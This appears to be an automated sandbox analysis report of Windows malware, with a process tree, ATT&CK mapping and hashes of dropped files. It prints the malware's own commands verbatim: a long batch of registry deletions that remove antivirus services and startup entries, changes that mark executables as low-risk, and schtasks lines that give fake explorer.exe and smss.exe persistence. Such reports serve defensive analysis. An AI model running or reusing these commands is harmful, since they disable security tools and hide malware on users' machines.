"HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )4⤵
-
C:\Users\Admin\AppData\Local\Temp\BE96.exeC:\Users\Admin\AppData\Local\Temp\BE96.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\BE96.exeC:\Users\Admin\AppData\Local\Temp\BE96.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\CCFE.exeC:\Users\Admin\AppData\Local\Temp\CCFE.exe1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\CFDE.exeC:\Users\Admin\AppData\Local\Temp\CFDE.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 7362⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 7602⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 7642⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 8922⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 8562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\D26F.exeC:\Users\Admin\AppData\Local\Temp\D26F.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 7322⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 7482⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 7522⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 8802⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 7442⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\DtcInstall\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "B702" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\B702\B702.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\SysWOW64\twinui\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Boot\nb-NO\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
3Disabling Security Tools
1Virtualization/Sandbox Evasion
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\install.exeMD5
3319cb474eaa2f3812956b271ff29635
SHA174fbed926e8de14fa5eb6a5a47fb873def72fb81
SHA25679d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a
SHA512c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347
-
C:\ProgramData\Data\install.exeMD5
3319cb474eaa2f3812956b271ff29635
SHA174fbed926e8de14fa5eb6a5a47fb873def72fb81
SHA25679d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a
SHA512c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347
-
C:\ProgramData\Runtimebroker.exeMD5
46fd8caf1c1ff128c4d121d58a2e9306
SHA1f10607b0db63cf47e9fe8c01fc819e124349dc84
SHA256f15112b43c4fbd5a9b6cd2009abc371e1180ab7a13a2a745fa79d220f31dcbbc
SHA5126307d93927ce8b143dd2babdbbcbb7e5336c2fc315cbcd4c231f9a1fd2199d82ec6bff14aa1f66438ef3ca11ff8806b31de8d344c21cc400dd5795c3788df540
-
C:\ProgramData\Runtimebroker.exeMD5
46fd8caf1c1ff128c4d121d58a2e9306
SHA1f10607b0db63cf47e9fe8c01fc819e124349dc84
SHA256f15112b43c4fbd5a9b6cd2009abc371e1180ab7a13a2a745fa79d220f31dcbbc
SHA5126307d93927ce8b143dd2babdbbcbb7e5336c2fc315cbcd4c231f9a1fd2199d82ec6bff14aa1f66438ef3ca11ff8806b31de8d344c21cc400dd5795c3788df540
-
C:\ProgramData\Systemd\HostData.exeMD5
cbf26c74a0a12b5f17ba7596ff6ad19f
SHA16dc733432c290f1fbf5ddda2571b7f538445202b
SHA256095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983
SHA5128a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b
-
C:\ProgramData\Systemd\HostData.exeMD5
cbf26c74a0a12b5f17ba7596ff6ad19f
SHA16dc733432c290f1fbf5ddda2571b7f538445202b
SHA256095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983
SHA5128a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b
-
C:\ProgramData\Systemd\config.jsonMD5
a285ac140c8c6806223bfdc02302173e
SHA106ca61cae058c568860858e49615d04dc4a8820d
SHA25636d5713cc13ea15449ab8defc943e42cc657b503a79f0859600ea275598441eb
SHA512f82eae8304aa9ba504eba0e96468fdac08420b0e158c3263a4f47474b02fb5f751b1bd2335e71a33341d81a495083c7dd8e0479e2c48dbaf6a3f7fefb9f4054b
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
c558fdaa3884f969f1ec904ae7bbd991
SHA1b4f85d04f6bf061a17f52c264c065b786cfd33ff
SHA2563e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e
SHA5126523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
627b2af61da3d1d1295504e6ceb17f5b
SHA135ced52cb9bd0f2d897a5d9b87299fa5b477a049
SHA256edef61840150979d18efd7d23b0636d1b677facf25b6f148aabda7b41ac37951
SHA5128c8ef976e8a06183ef8e981e31cce2cc51bdee93bdcea21a6961931778bd814fc3a8bececce6fd0731a2e99ded29f98119489dacd538a203ee0328570f9168e8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
ad6843f65114b97c6eb57a6d429acc78
SHA16a31ab6a245aa96672ce6684d799e662d62db082
SHA256c8c321bdc13163d313693416ee2aa115fea7465cbbbe4ca571d23f1c057dcf54
SHA51220d0287f5da03a7233a6240fb703238b2876d769b7acf76d5ae03972139ac8d67bb38689355687f8e50be2749751ab32fbc15c86e1b95e9c4dfd00d92a28828a
-
C:\Users\Admin\AppData\Local\Temp\ADCA.exeMD5
e987477b0d14b6d7075f0105aa28ba92
SHA154bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA2564fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\ADCA.exeMD5
e987477b0d14b6d7075f0105aa28ba92
SHA154bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA2564fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
